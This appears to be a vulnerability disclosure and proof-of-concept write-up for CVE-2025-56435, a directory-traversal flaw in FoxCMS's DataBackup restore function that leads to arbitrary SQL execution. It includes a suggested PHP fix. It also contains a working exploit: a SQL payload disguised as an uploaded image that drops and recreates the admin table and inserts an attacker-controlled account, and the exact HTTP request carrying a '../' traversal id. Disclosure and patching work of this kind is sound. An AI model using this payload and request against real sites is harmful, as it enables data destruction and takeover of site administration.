PoC details: b5399b017df26af584da71c68c54c1066202c47a

Related vulnerability
Title: FoxCMS security vulnerability (CVE-2025-56435)
Description: FoxCMS is a free-for-commercial-use, open-source content management system from the Chinese company Qianhu (FoxCMS). FoxCMS v1.2.6 and earlier contain a security vulnerability: improper handling of the id parameter in the file /DataBackup.php leads to SQL injection.
Description: CVE-2025-56435

Introduction

# -CVE-2025-56435
The restore method in the app\admin\controller\DataBackup.php controller reads the parameter id and builds a file path from it (`$sqlPath = app()->getRootPath() . 'data' . $id;`). Because id is concatenated directly into the path without validation, `../` sequences in it allow directory traversal.
A for loop then executes the SQL statements contained in the file at that path. As a result, any uploaded image file that contains SQL statements can be selected through this method and "restored", and arbitrary SQL is executed.
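A hardened version of the path handling, added here as an example and not FoxCMS's own code: the backup id is restricted to a plain `.sql` file name, resolved under the backup directory, and rejected if it resolves anywhere else. The function name `safeBackupPath`, the base-directory argument and the file-name pattern are assumptions.

```php
<?php
// Added example (not FoxCMS code): validate a backup id before using it as a path.
// Returns the resolved path of an allowed backup file, or null if the id is rejected.
function safeBackupPath(string $baseDir, string $id): ?string
{
    // Assumption: backups are plain file names such as "20250710_1.sql".
    // Directory separators, NUL bytes and non-.sql extensions are rejected outright,
    // so an uploaded .svg under uploads/files can never be selected.
    if (!preg_match('/^[A-Za-z0-9_\-]+\.sql$/', $id)) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null; // backup directory missing
    }

    // realpath() collapses any "../" components; a candidate that resolved
    // outside $base fails the prefix check below.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $id);
    if ($candidate === false) {
        return null; // file does not exist
    }
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null; // escaped the backup directory
    }
    return $candidate;
}

// Assumed usage in the restore handler (shape is illustrative, not the project's code):
// $sqlPath = safeBackupPath(app()->getRootPath() . 'data', $id);
// if ($sqlPath === null) {
//     return json(['code' => 0, 'msg' => 'invalid backup id']);
// }
// ... only then iterate over the statements in $sqlPath
```

Restricting the id to a fixed name pattern and checking the resolved path both matter: the pattern blocks traversal before any filesystem access, and the realpath prefix check catches symlinks or unexpected base-directory layouts.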

<img width="864" height="367" alt="image" src="https://github.com/user-attachments/assets/0093d223-f625-4dd8-8fed-804c1fec5db9" />

Reproduction of the vulnerability:
After setting up the environment, upload any image file containing the following SQL statements (they create a new user):
```sql
DROP TABLE IF EXISTS `fox_admin`;
CREATE TABLE `fox_admin` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `nickname` varchar(255) DEFAULT NULL COMMENT '昵称',
  `username` varchar(60) NOT NULL DEFAULT '' COMMENT '用户名',
  `password` varchar(64) NOT NULL DEFAULT '' COMMENT '登录密码;mb_password加密',
  `avatar` varchar(255) DEFAULT '' COMMENT '用户头像,相对于upload/avatar目录',
  `email` varchar(100) DEFAULT '' COMMENT '登录邮箱',
  `phone` bigint(20) unsigned DEFAULT NULL COMMENT '手机号',
  `status` tinyint(1) NOT NULL DEFAULT '1' COMMENT '用户状态 0:禁用; 1:启用',
  `register_time` datetime DEFAULT NULL COMMENT '注册时间',
  `last_login_ip` varchar(16) DEFAULT '' COMMENT '最后登录ip',
  `last_login_time` datetime DEFAULT NULL COMMENT '最后登录时间',
  `remark` varchar(100) DEFAULT NULL COMMENT '备注',
  `lock_time` datetime DEFAULT NULL COMMENT '账号锁定时间',
  PRIMARY KEY (`id`) USING BTREE,
  KEY `user_login_key` (`username`) USING BTREE
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 ROW_FORMAT=DYNAMIC COMMENT='后台用户表';

INSERT INTO `fox_admin` (
  `nickname`,
  `username`,
  `password`,
  `avatar`,
  `email`,
  `phone`,
  `status`,
  `register_time`,
  `last_login_ip`,
  `last_login_time`,
  `remark`,
  `lock_time`
) VALUES (
  '测试管理员',
  'test12311',
  MD5('123QWQW@@'),
  '/uploads/avatar/default.jpg',
  'test12311@example.com',
  13800138000,
  1,
  NOW(),
  '',
  NULL,
  '通过SQL添加的测试账户',
  NULL
);
```

<img width="864" height="383" alt="image" src="https://github.com/user-attachments/assets/90eb7dc9-c031-4a8c-96c8-5bdabbfba917" />
<img width="863" height="418" alt="image" src="https://github.com/user-attachments/assets/b62f8bad-3770-4e60-8044-29266ae9042e" />
<img width="863" height="418" alt="image" src="https://github.com/user-attachments/assets/0680bb12-a9d1-4293-b22e-809ecb1fdcee" />

Note the uploaded file's path, then trigger execution of the SQL statements:
<img width="865" height="378" alt="image" src="https://github.com/user-attachments/assets/ecb5f20f-9523-4ed8-8236-2a8743346a2d" />

```http
POST /index.php/admin2362/DataBackup/restore HTTP/1.1
Host: 192.168.187.92:82
Content-Length: 55
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.187.92:82
Referer: 
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=04c9924960eddfff731546b6e79bbe4a; access_192_168_187_92=1752108777
Connection: keep-alive

id=/1/../../uploads/files/20250710/25c300de9e16f965.svg
```
A new user has been created:
http://192.168.187.92:82/index.php/admin2362/admin/index.html?columnId=11
<img width="864" height="371" alt="image" src="https://github.com/user-attachments/assets/b30d0bd9-cbb4-4f91-ac5a-e556694ebbad" />
